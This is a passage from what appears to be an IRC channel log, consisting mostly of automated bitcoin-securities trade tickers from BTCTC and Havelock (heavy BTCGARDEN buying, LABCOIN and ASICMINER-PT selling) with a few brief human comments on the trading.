@ 0.4012 = 1.6048 BTC [-] Aug 03 09:59:20 [BTCTC] [BASIC-MINING] 3 @ 0.4011 = 1.2033 BTC [-] Aug 03 09:59:21 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [-] Aug 03 09:59:22 [BTCTC] [BASIC-MINING] 2 @ 0.4 = 0.8 BTC [-] Aug 03 09:59:23 [BTCTC] [BASIC-MINING] 19 @ 0.3672 = 6.9768 BTC [-] Aug 03 09:59:23 [BTCTC] [BASIC-MINING] 1 @ 0.3665 BTC [-] Aug 03 09:59:24 [BTCTC] [BASIC-MINING] 20 @ 0.3664 = 7.328 BTC [-] Aug 03 09:59:25 [BTCTC] [BASIC-MINING] 1 @ 0.3599 BTC [-] Aug 03 09:59:27 [BTCTC] [BASIC-MINING] 40 @ 0.35 = 14 BTC [-] Aug 03 09:59:28 [BTCTC] [ACTIVEMINING] 25 @ 0.006045 = 0.1511 BTC [-] Aug 03 09:59:29 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [-] Aug 03 09:59:30 [BTCTC] [ACTIVEMINING] 18 @ 0.006044 = 0.1088 BTC [-] Aug 03 09:59:31 [BTCTC] [BASIC-MINING] 4 @ 0.35 = 1.4 BTC [-] Aug 03 09:59:32 [BTCTC] [BASIC-MINING] 2 @ 0.35 = 0.7 BTC [-] Aug 03 09:59:33 [BTCTC] [BTCGARDEN] 170 @ 0.016 = 2.72 BTC [+] Aug 03 09:59:33 [HAVELOCK] [XBOND] 150000 @ 0.001 = 150 BTC [+] Aug 03 09:59:36 [BTCTC] [BTCGARDEN] 2700 @ 0.016 = 43.2 BTC [+] Aug 03 09:59:38 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 09:59:57 [BTCTC] [BTCGARDEN] 16 @ 0.016 = 0.256 BTC [+] Aug 03 10:00:05 [HAVELOCK] [XBOND] 3528 @ 0.001 = 3.528 BTC [+] Aug 03 10:00:08 [HAVELOCK] [XBOND] 106 @ 0.001 = 0.106 BTC [+] Aug 03 10:00:10 [HAVELOCK] [XBOND] 6366 @ 0.0010498 = 6.683 BTC [+] Aug 03 10:00:27 [BTCTC] [LABCOIN] 3 @ 0.001898 = 0.0057 BTC [-] Aug 03 10:00:38 [BTCTC] [LABCOIN] 3 @ 0.001898 = 0.0057 BTC [-] Aug 03 10:00:45 [BTCTC] [ACTIVEMINING] 25 @ 0.006297 = 0.1574 BTC [+] Aug 03 10:00:46 d Aug 03 10:00:47 [BTCTC] [ACTIVEMINING] 33 @ 0.006298 = 0.2078 BTC [+] Aug 03 10:00:47 [BTCTC] [ACTIVEMINING] 122 @ 0.006298 = 0.7684 BTC [+] Aug 03 10:00:48 [BTCTC] [LABCOIN] 3000 @ 0.001893 = 5.679 BTC [-] Aug 03 10:01:18 [BTCTC] [LABCOIN] 1867 @ 0.001892 = 3.5324 BTC [-] Aug 03 10:01:28 [BTCTC] [BTCGARDEN] 37445 @ 0.016 = 599.12 BTC [+] Aug 03 10:01:55 [BTCTC] [DMS.SELLING] 11 @ 0.02373 = 0.261 BTC [-] Aug 03 10:01:57 [BTCTC] [DMS.SELLING] 20 @ 0.02373 = 0.4746 BTC [-] Aug 03 10:01:58 [BTCTC] [DMS.SELLING] 10 @ 0.0237 = 0.237 BTC [-] Aug 03 10:02:00 [BTCTC] [BASIC-MINING] 2 @ 0.341 = 0.682 BTC [-] Aug 03 10:02:01 [BTCTC] [BASIC-MINING] 7 @ 0.3405 = 2.3835 BTC [-] Aug 03 10:02:03 [BTCTC] [BASIC-MINING] 5 @ 0.3403 = 1.7015 BTC [-] Aug 03 10:02:13 [BTCTC] [LABCOIN] 805 @ 0.001898 = 1.5279 BTC [+] Aug 03 10:02:33 [BTCTC] [BASIC-MINING] 3 @ 0.3401 = 1.0203 BTC [-] Aug 03 10:02:46 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 10:02:49 [BTCTC] [LABCOIN] 4346 @ 0.001892 = 8.2226 BTC [-] Aug 03 10:02:51 [BTCTC] [LABCOIN] 1700 @ 0.001891 = 3.2147 BTC [-] Aug 03 10:02:52 [BTCTC] [LABCOIN] 2500 @ 0.00189 = 4.725 BTC [-] Aug 03 10:02:53 [BTCTC] [LABCOIN] 1454 @ 0.001889 = 2.7466 BTC [-] Aug 03 10:02:55 [BTCTC] [BTCGARDEN] 4990 @ 0.016 = 79.84 BTC [+] Aug 03 10:02:57 [BTCTC] [BTCGARDEN] 120 @ 0.016 = 1.92 BTC [+] Aug 03 10:03:08 [BTCTC] [BTCGARDEN] 3900 @ 0.016 = 62.4 BTC [+] Aug 03 10:03:39 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 03 10:03:41 [BTCTC] [BTCGARDEN] 396 @ 0.016 = 6.336 BTC [+] Aug 03 10:03:43 [BTCTC] [BTCGARDEN] 295 @ 0.016 = 4.72 BTC [+] Aug 03 10:03:46 [BTCTC] [BTCGARDEN] 65 @ 0.016 = 1.04 BTC [+] Aug 03 10:04:18 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 10:04:38 [BTCTC] [BTCGARDEN] 2655 @ 0.016 = 42.48 BTC [+] Aug 03 10:04:44 [BTCTC] [DMS.MINING] 30 @ 0.01016 = 0.3048 BTC [+] Aug 03 10:04:46 [BTCTC] [DMS.MINING] 70 @ 0.01016 = 0.7112 BTC [+] Aug 03 10:04:59 garden is really sucking up coins.. well. if it's for another flip like lab, i'm curious if there is money left on the table to drive the price upwards Aug 03 10:05:18 it can only end badly Aug 03 10:05:22 [BTCTC] [DMS.MINING] 37 @ 0.01016 = 0.3759 BTC [+] Aug 03 10:06:13 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 10:06:16 [BTCTC] [BTCGARDEN] 10000 @ 0.016 = 160 BTC [+] Aug 03 10:06:28 [BTCTC] [LABCOIN] 173 @ 0.00189 = 0.327 BTC [+] Aug 03 10:06:50 [BTCTC] [BTCGARDEN] 1246 @ 0.016 = 19.936 BTC [+] Aug 03 10:08:18 [BTCTC] [DMS.MINING] 50 @ 0.0102 = 0.51 BTC [+] Aug 03 10:08:29 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 10:09:25 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 03 10:09:37 [BTCTC] [BTCGARDEN] 46 @ 0.016 = 0.736 BTC [+] Aug 03 10:10:28 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 03 10:10:30 [BTCTC] [ASICMINER-PT] 5 @ 3.996 = 19.98 BTC [-] Aug 03 10:10:31 [BTCTC] [ASICMINER-PT] 5 @ 3.996 = 19.98 BTC [-] Aug 03 10:10:32 [BTCTC] [ASICMINER-PT] 1 @ 3.996 BTC [-] Aug 03 10:10:33 [BTCTC] [ASICMINER-PT] 8 @ 3.995 = 31.96 BTC [-] Aug 03 10:10:38 [BTCTC] [BTCGARDEN] 2315 @ 0.016 = 37.04 BTC [+] Aug 03 10:10:46 [BTCTC] [ASICMINER-PT] 2 @ 3.995 = 7.99 BTC [-] Aug 03 10:10:48 [BTCTC] [ASICMINER-PT] 1 @ 3.98 BTC [-] Aug 03 10:10:49 [BTCTC] [ASICMINER-PT] 1 @ 3.972 BTC [-] Aug 03 10:10:50 [BTCTC] [ASICMINER-PT] 8 @ 3.971 = 31.768 BTC [-] Aug 03 10:10:58 [BTCTC] [BTCGARDEN] 1312 @ 0.016 = 20.992 BTC [+] Aug 03 10:11:07 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 03 10:11:14 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.002505 = 0.0501 BTC [-] Aug 03 10:11:22 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 10:11:55 [BTCTC] [BTCGARDEN] 532 @ 0.016 = 8.512 BTC [+] Aug 03 10:11:58 [BTCTC] [TAT.VIRTUALMINE] 81 @ 0.002504 = 0.2028 BTC [-] Aug 03 10:12:09 [BTCTC] [BTCGARDEN] 4888 @ 0.016 = 78.208 BTC [+] Aug 03 10:12:11 [BTCTC] [BASIC-MINING] 2 @ 0.3401 = 0.6802 BTC [-] Aug 03 10:12:15 [BTCTC] [BASIC-MINING] 3 @ 0.3401 = 1.0203 BTC [-] Aug 03 10:12:35 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:13:05 [BTCTC] [BTCGARDEN] 1185 @ 0.016 = 18.96 BTC [+] Aug 03 10:13:08 [BTCTC] [BTCGARDEN] 6500 @ 0.016 = 104 BTC [+] Aug 03 10:13:18 [BTCTC] [COGNITIVE] 5 @ 0.47 = 2.35 BTC [-] Aug 03 10:13:40 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 10:14:29 [BTCTC] [BTCGARDEN] 17 @ 0.016 = 0.272 BTC [+] Aug 03 10:14:32 [BTCTC] [COGNITIVE] 3 @ 0.47 = 1.41 BTC [-] Aug 03 10:14:33 [BTCTC] [COGNITIVE] 1 @ 0.47 BTC [-] Aug 03 10:14:35 [BTCTC] [COGNITIVE] 1 @ 0.462 BTC [-] Aug 03 10:14:35 [BTCTC] [COGNITIVE] 1 @ 0.462 BTC [-] Aug 03 10:14:36 [BTCTC] [COGNITIVE] 5 @ 0.46 = 2.3 BTC [-] Aug 03 10:14:37 [BTCTC] [COGNITIVE] 26 @ 0.4503 = 11.7078 BTC [-] Aug 03 10:14:38 [BTCTC] [COGNITIVE] 20 @ 0.4502 = 9.004 BTC [-] Aug 03 10:14:40 [BTCTC] [COGNITIVE] 3 @ 0.45 = 1.35 BTC [-] Aug 03 10:14:41 [BTCTC] [COGNITIVE] 1 @ 0.4438 BTC [-] Aug 03 10:14:42 [BTCTC] [COGNITIVE] 2 @ 0.4334 = 0.8668 BTC [-] Aug 03 10:14:43 [BTCTC] [COGNITIVE] 3 @ 0.4105 = 1.2315 BTC [-] Aug 03 10:15:35 is it too soon to declare conventional stocks as dead? Aug 03 10:15:36 [BTCTC] [BTCGARDEN] 1850 @ 0.016 = 29.6 BTC [+] Aug 03 10:15:45 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:17:12 [BTCTC] [BTCGARDEN] 1500 @ 0.016 = 24 BTC [+] Aug 03 10:17:29 [BTCTC] [LABCOIN] 1546 @ 0.001889 = 2.9204 BTC [-] Aug 03 10:17:31 [BTCTC] [LABCOIN] 333 @ 0.001889 = 0.629 BTC [-] Aug 03 10:17:32 [BTCTC] [LABCOIN] 1000 @ 0.001888 = 1.888 BTC [-] Aug 03 10:17:33 [BTCTC] [LABCOIN] 121 @ 0.001887 = 0.2283 BTC [-] Aug 03 10:17:56 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:18:53 [BTCTC] [BTCGARDEN] 280 @ 0.016 = 4.48 BTC [+] Aug 03 10:19:12 [BTCTC] [ACTIVEMINING] 25 @ 0.006111 = 0.1528 BTC [-] Aug 03 10:19:13 [BTCTC] [LABCOIN] 105 @ 0.001887 = 0.1981 BTC [-] Aug 03 10:19:14 [BTCTC] [ACTIVEMINING] 50 @ 0.00611 = 0.3055 BTC [-] Aug 03 10:19:16 [BTCTC] [ACTIVEMINING] 6 @ 0.006108 = 0.0366 BTC [-] Aug 03 10:19:16 [BTCTC] [ACTIVEMINING] 50 @ 0.006105 = 0.3053 BTC [-] Aug 03 10:19:17 [BTCTC] [ACTIVEMINING] 94 @ 0.0061 = 0.5734 BTC [-] Aug 03 10:19:46 [BTCTC] [BTCGARDEN] 38 @ 0.016 = 0.608 BTC [+] Aug 03 10:20:16 [BTCTC] [CRYPTO-TRADE] 8 @ 0.1953 = 1.5624 BTC [-] Aug 03 10:20:32 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 10:20:42 [BTCTC] [DMS.SELLING] 25 @ 0.0242 = 0.605 BTC [+] Aug 03 10:20:50 [BTCTC] [LABCOIN] 129 @ 0.001888 = 0.2436 BTC [+] Aug 03 10:20:55 [BTCTC] [LABCOIN] 771 @ 0.001887 = 1.4549 BTC [-] Aug 03 10:21:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.039 = 0.117 BTC [-] Aug 03 10:21:03 [BTCTC] [ASICMINER-PT] 1 @ 3.971 BTC [-] Aug 03 10:21:30 [BTCTC] [BTCGARDEN] 39 @ 0.016 = 0.624 BTC [+] Aug 03 10:21:39 [BTCTC] [BTCGARDEN] 60 @ 0.016 = 0.96 BTC [+] Aug 03 10:21:40 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 10:21:56 [BTCTC] [BTCGARDEN] 18 @ 0.016 = 0.288 BTC [+] Aug 03 10:21:57 [BTCTC] [CRYPTO-TRADE] 25 @ 0.1953 = 4.8825 BTC [-] Aug 03 10:22:01 [BTCTC] [ASICMINER-PT] 4 @ 3.969 = 15.876 BTC [-] Aug 03 10:22:11 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 03 10:22:12 [BTCTC] [ASICMINER-PT] 1 @ 3.969 BTC [-] Aug 03 10:22:14 [BTCTC] [ASICMINER-PT] 2 @ 3.96 = 7.92 BTC [-] Aug 03 10:22:15 [BTCTC] [ASICMINER-PT] 3 @ 3.96 = 11.88 BTC [-] Aug 03 10:22:23 [BTCTC] [BTCGARDEN] 525 @ 0.016 = 8.4 BTC [+] Aug 03 10:22:57 [BTCTC] [BTCGARDEN] 85 @ 0.016 = 1.36 BTC [+] Aug 03 10:23:12 [BTCTC] [LABCOIN] 4 @ 0.001887 = 0.0075 BTC [-] Aug 03 10:23:14 [BTCTC] [LABCOIN] 1 @ 0.001885 BTC [-] Aug 03 10:23:15 [BTCTC] [LABCOIN] 9 @ 0.001884 = 0.017 BTC [-] Aug 03 10:23:16 [BTCTC] [LABCOIN] 313 @ 0.001883 = 0.5894 BTC [-] Aug 03 10:23:17 [BTCTC] [LABCOIN] 1673 @ 0.001882 = 3.1486 BTC [-] Aug 03 10:23:23 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 03 10:23:40 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:23:45 [BTCTC] [BTCGARDEN] 1498 @ 0.016 = 23.968 BTC [+] Aug 03 10:24:03 [BTCTC] [LABCOIN] 5 @ 0.001977 = 0.0099 BTC [+] Aug 03 10:24:25 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [+] Aug 03 10:24:28 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 10:24:29 [BTCTC] [ASICMINER-PT] 2 @ 3.955 = 7.91 BTC [-] Aug 03 10:24:31 [BTCTC] [ASICMINER-PT] 4 @ 3.95 = 15.8 BTC [-] Aug 03 10:24:53 [BTCTC] [ACTIVEMINING] 1 @ 0.00629 BTC [+] Aug 03 10:25:12 [BTCTC] [BTCGARDEN] 950 @ 0.016 = 15.2 BTC [+] Aug 03 10:25:15 [BTCTC] [BTCGARDEN] 56 @ 0.016 = 0.896 BTC [+] Aug 03 10:25:24 [BTCTC] [BTCGARDEN] 155 @ 0.016 = 2.48 BTC [+] Aug 03 10:26:10 [HAVELOCK] [SMG] 26 @ 0.000235 = 0.0061 BTC [-] Aug 03 10:26:12 [BTCTC] [ASICMINER-PT] 2 @ 3.95 = 7.9 BTC [-] Aug 03 10:26:16 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:26:18 [BTCTC] [COGNITIVE] 4 @ 0.4105 = 1.642 BTC [-] Aug 03 10:26:36 [BTCTC] [BTCGARDEN] 800 @ 0.016 = 12.8 BTC [+] Aug 03 10:26:46 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 03 10:26:49 [BTCTC] [BTCGARDEN] 62 @ 0.016 = 0.992 BTC [+] Aug 03 10:26:53 [BTCTC] [BTCGARDEN] 43 @ 0.016 = 0.688 BTC [+] Aug 03 10:27:21 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:27:22 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 10:27:37 [BTCTC] [BTCGARDEN] 1750 @ 0.016 = 28 BTC [+] Aug 03 10:27:40 [BTCTC] [BTCGARDEN] 1225 @ 0.016 = 19.6 BTC [+] Aug 03 10:28:13 [BTCTC] [DMS.SELLING] 100 @ 0.0236 = 2.36 BTC [-] Aug 03 10:28:15 [BTCTC] [DMS.SELLING] 20 @ 0.0236 = 0.472 BTC [-] Aug 03 10:28:36 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 10:28:45 [BTCTC] [ASICMINER-PT] 1 @ 3.951 BTC [+] Aug 03 10:28:47 [BTCTC] [ASICMINER-PT] 4 @ 3.95 = 15.8 BTC [-] Aug 03 10:28:48 [BTCTC] [ASICMINER-PT] 10 @ 3.925 = 39.25 BTC [-] Aug 03 10:28:49 [BTCTC] [ASICMINER-PT] 3 @ 3.923 = 11.769 BTC [-] Aug 03 10:28:51 [BTCTC] [BTCGARDEN] 62 @ 0.016 = 0.992 BTC [+] Aug 03 10:29:03 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 03 10:29:28 [BTCTC] [BTCGARDEN] 40 @ 0.016 = 0.64 BTC [+] Aug 03 10:29:45 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 03 10:29:48 [BTCTC] [ASICMINER-PT] 2 @ 4.049 = 8.098 BTC [+] Aug 03 10:29:58 [BTCTC] [BTCGARDEN] 635 @ 0.016 = 10.16 BTC [+] Aug 03 10:30:07 [BTCTC] [BTCGARDEN] 26 @ 0.016 = 0.416 BTC [+] Aug 03 10:30:59 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 10:31:07 [BTCTC] [ASICMINER-PT] 5 @ 4.05 = 20.25 BTC [+] Aug 03 10:31:18 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 10:31:22 [BTCTC] [BTCGARDEN] 6210 @ 0.016 = 99.36 BTC [+] Aug 03 10:31:23 [BTCTC] [TAT.ASICMINER] 7 @ 0.039 = 0.273 BTC [-] Aug 03 10:31:31 [BTCTC] [ASICMINER-PT] 1 @ 4.058 BTC [+] Aug 03 10:31:42 [BTCTC] [BTCGARDEN] 219 @ 0.016 = 3.504 BTC [+] Aug 03 10:31:57 [BTCTC] [ACTIVEMINING] 25 @ 0.006107 = 0.1527 BTC [-] Aug 03 10:31:59 [BTCTC] [ACTIVEMINING] 50 @ 0.006106 = 0.3053 BTC [-] Aug 03 10:32:09 [BTCTC] [BASIC-MINING] 2 @ 0.4199 = 0.8398 BTC [+] Aug 03 10:32:10 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 03 10:32:13 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:32:15 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 03 10:33:01 [BTCTC] [BTCGARDEN] 1470 @ 0.016 = 23.52 BTC [+] Aug 03 10:33:04 [BTCTC] [BASIC-MINING] 14 @ 0.3401 = 4.7614 BTC [-] Aug 03 10:33:18 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 10:33:33 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 03 10:34:08 [BTCTC] [BTCGARDEN] 60 @ 0.016 = 0.96 BTC [+] Aug 03 10:34:22 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:34:52 [BTCTC] [LABCOIN] 327 @ 0.001882 = 0.6154 BTC [-] Aug 03 10:34:54 [BTCTC] [LABCOIN] 390 @ 0.00188 = 0.7332 BTC [-] Aug 03 10:34:55 [BTCTC] [LABCOIN] 300 @ 0.00188 = 0.564 BTC [-] Aug 03 10:34:55 [BTCTC] [LABCOIN] 100 @ 0.001875 = 0.1875 BTC [-] Aug 03 10:34:57 [BTCTC] [LABCOIN] 70 @ 0.00187 = 0.1309 BTC [-] Aug 03 10:34:58 [BTCTC] [LABCOIN] 200 @ 0.001861 = 0.3722 BTC [-] Aug 03 10:34:59 [BTCTC] [LABCOIN] 800 @ 0.001861 = 1.4888 BTC [-] Aug 03 10:35:00 [BTCTC] [LABCOIN] 500 @ 0.001861 = 0.9305 BTC [-] Aug 03 10:35:02 [BTCTC] [LABCOIN] 308 @ 0.00186 = 0.5729 BTC [-] Aug 03 10:35:31 [BTCTC] [S.MPOE-PT] 96 @ 0.00086 = 0.0826 BTC [-] Aug 03 10:35:41 [BTCTC] [BTCGARDEN] 1280 @ 0.016 = 20.48 BTC [+] Aug 03 10:35:46 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:35:49 [BTCTC] [BTCGARDEN] 617 @ 0.016 = 9.872 BTC [+] Aug 03 10:36:34 [BTCTC] [BTCGARDEN] 700 @ 0.016 = 11.2 BTC [+] Aug 03 10:36:44 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:36:53 [BTCTC] [BTCGARDEN] 5375 @ 0.016 = 86 BTC [+] Aug 03 10:37:05 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 03 10:37:13 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 10:37:41 [BTCTC] [ASICMINER-PT] 2 @ 3.951 = 7.902 BTC [-] Aug 03 10:37:49 [BTCTC] [BTCGARDEN] 30000 @ 0.016 = 480 BTC [+] Aug 03 10:37:52 [BTCTC] [BTCGARDEN] 80 @ 0.016 = 1.28 BTC [+] Aug 03 10:37:55 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:38:22 [BTCTC] [DMS.MINING] 42 @ 0.009907 = 0.4161 BTC [-] Aug 03 10:38:23 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 10:38:58 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:39:21 [BTCTC] [TAT.ASICMINER] 25 @ 0.0385 = 0.9625 BTC [-] Aug 03 10:39:28 [BTCTC] [BTCGARDEN] 350 @ 0.016 = 5.6 BTC [+] Aug 03 10:39:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.0383 = 0.0766 BTC [-] Aug 03 10:39:41 [BTCTC] [ASICMINER-PT] 1 @ 3.95 BTC [-] Aug 03 10:40:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.03815 BTC [-] Aug 03 10:40:22 [BTCTC] [ASICMINER-PT] 1 @ 3.951 BTC [+] Aug 03 10:40:24 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 10:40:33 [BTCTC] [ACTIVEMINING] 15 @ 0.006101 = 0.0915 BTC [-] Aug 03 10:41:14 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 03 10:41:16 [BTCTC] [LTC-ATF.B2] 398 @ 0.01002 = 3.988 BTC [-] Aug 03 10:41:22 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 10:41:33 [BTCTC] [BTCGARDEN] 730 @ 0.016 = 11.68 BTC [+] Aug 03 10:41:34 [BTCTC] [ACTIVEMINING] 13 @ 0.00628 = 0.0816 BTC [+] Aug 03 10:41:39 [BTCTC] [BTCGARDEN] 130 @ 0.016 = 2.08 BTC [+] Aug 03 10:41:41 [BTCTC] [ASICMINER-PT] 1 @ 3.95 BTC [-] Aug 03 10:41:44 [BTCTC] [BTCGARDEN] 750 @ 0.016 = 12 BTC [+] Aug 03 10:41:47 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:41:50 [BTCTC] [BTCGARDEN] 4745 @ 0.016 = 75.92 BTC [+] Aug 03 10:41:56 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 10:42:05 [BTCTC] [BTCGARDEN] 248 @ 0.016 = 3.968 BTC [+] Aug 03 10:42:07 [BTCTC] [BTCGARDEN] 45 @ 0.016 = 0.72 BTC [+] Aug 03 10:42:33 [BTCTC] [TAT.ASICMINER] 13 @ 0.039 = 0.507 BTC [+] Aug 03 10:42:34 [BTCTC] [TAT.ASICMINER] 9 @ 0.03815 = 0.3434 BTC [-] Aug 03 10:42:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.03811 BTC [-] Aug 03 10:42:37 [BTCTC] [TAT.ASICMINER] 75 @ 0.0381 = 2.8575 BTC [-] Aug 03 10:42:41 [BTCTC] [BTCGARDEN] 40 @ 0.016 = 0.64 BTC [+] Aug 03 10:42:43 [BTCTC] [LABCOIN] 50 @ 0.00192 = 0.096 BTC [+] Aug 03 10:42:44 [BTCTC] [LABCOIN] 1 @ 0.0019 BTC [-] Aug 03 10:42:57 [BTCTC] [BTCGARDEN] 9 @ 0.016 = 0.144 BTC [+] Aug 03 10:43:17 [BTCTC] [BTCGARDEN] 230 @ 0.016 = 3.68 BTC [+] Aug 03 10:43:20 [BTCTC] [BTCGARDEN] 130 @ 0.016 = 2.08 BTC [+] Aug 03 10:43:24 [BTCTC] [ACTIVEMINING] 155 @ 0.006274 = 0.9725 BTC [-] Aug 03 10:43:25 [BTCTC] [BTCGARDEN] 244 @ 0.016 = 3.904 BTC [+] Aug 03 10:43:26 [BTCTC] [ACTIVEMINING] 126 @ 0.006275 = 0.7907 BTC [+] Aug 03 10:43:42 [BTCTC] [ACTIVEMINING] 25 @ 0.006101 = 0.1525 BTC [-] Aug 03 10:43:44 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 03 10:44:00 [BTCTC] [ACTIVEMINING] 40 @ 0.006037 = 0.2415 BTC [-] Aug 03 10:44:01 [BTCTC] [ACTIVEMINING] 160 @ 0.006036 = 0.9658 BTC [-] Aug 03 10:44:03 [BTCTC] [ACTIVEMINING] 32 @ 0.006007 = 0.1922 BTC [-] Aug 03 10:44:04 [BTCTC] [ACTIVEMINING] 130 @ 0.006006 = 0.7808 BTC [-] Aug 03 10:44:06 [BTCTC] [ACTIVEMINING] 1652 @ 0.005843 = 9.6526 BTC [-] Aug 03 10:44:16 [BTCTC] [ASICMINER-PT] 1 @ 3.924 BTC [-] Aug 03 10:44:24 [BTCTC] [LABCOIN] 2 @ 0.001882 = 0.0038 BTC [-] Aug 03 10:44:24 [BTCTC] [LABCOIN] 90 @ 0.001865 = 0.1679 BTC [-] Aug 03 10:44:26 [BTCTC] [LABCOIN] 80 @ 0.001865 = 0.1492 BTC [-] Aug 03 10:44:27 [BTCTC] [LABCOIN] 1242 @ 0.001861 = 2.3114 BTC [-] Aug 03 10:44:38 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 10:44:41 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 10:44:44 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 10:44:48 [BTCTC] [BTCGARDEN] 244 @ 0.016 = 3.904 BTC [+] Aug 03 10:45:14 [BTCTC] [BTCGARDEN] 5500 @ 0.016 = 88 BTC [+] Aug 03 10:45:54 [BTCTC] [BTCGARDEN] 60 @ 0.016 = 0.96 BTC [+] Aug 03 10:45:55 [BTCTC] [ASICMINER-PT] 1 @ 3.923 BTC [-] Aug 03 10:46:07 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [+] Aug 03 10:46:28 [BTCTC] [BTCGARDEN] 243 @ 0.016 = 3.888 BTC [+] Aug 03 10:46:31 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 03 10:46:44 [BTCTC] [BTCGARDEN] 171 @ 0.016 = 2.736 BTC [+] Aug 03 10:46:55 [BTCTC] [BTCGARDEN] 290 @ 0.016 = 4.64 BTC [+] Aug 03 10:47:20 [BTCTC] [BTCGARDEN] 8 @ 0.016 = 0.128 BTC [+] Aug 03 10:47:21 [BTCTC] [ASICMINER-PT] 1 @ 3.923 BTC [-] Aug 03 10:47:30 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 10:47:32 [BTCTC] [BTCGARDEN] 735 @ 0.016 = 11.76 BTC [+] Aug 03 10:48:01 [BTCTC] [BTCGARDEN] 243 @ 0.016 = 3.888 BTC [+] Aug 03 10:48:55 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 10:49:36 [BTCTC] [ASICMINER-PT] 1 @ 3.912 BTC [-] Aug 03 10:50:14 [BTCTC] [BTCGARDEN] 2044 @ 0.016 = 32.704 BTC [+] Aug 03 10:50:49 [BTCTC] [DMS.SELLING] 37 @ 0.02296 = 0.8495 BTC [-] Aug 03 10:50:51 [BTCTC] [DMS.SELLING] 20 @ 0.02296 = 0.4592 BTC [-] Aug 03 10:50:52 [BTCTC] [DMS.SELLING] 200 @ 0.0227 = 4.54 BTC [-] Aug 03 10:50:53 [BTCTC] [DMS.SELLING] 99 @ 0.02262 = 2.2394 BTC [-] Aug 03 10:51:02 [BTCTC] [BTCGARDEN] 3700 @ 0.016 = 59.2 BTC [+] Aug 03 10:51:12 [BTCTC] [BTCGARDEN] 600 @ 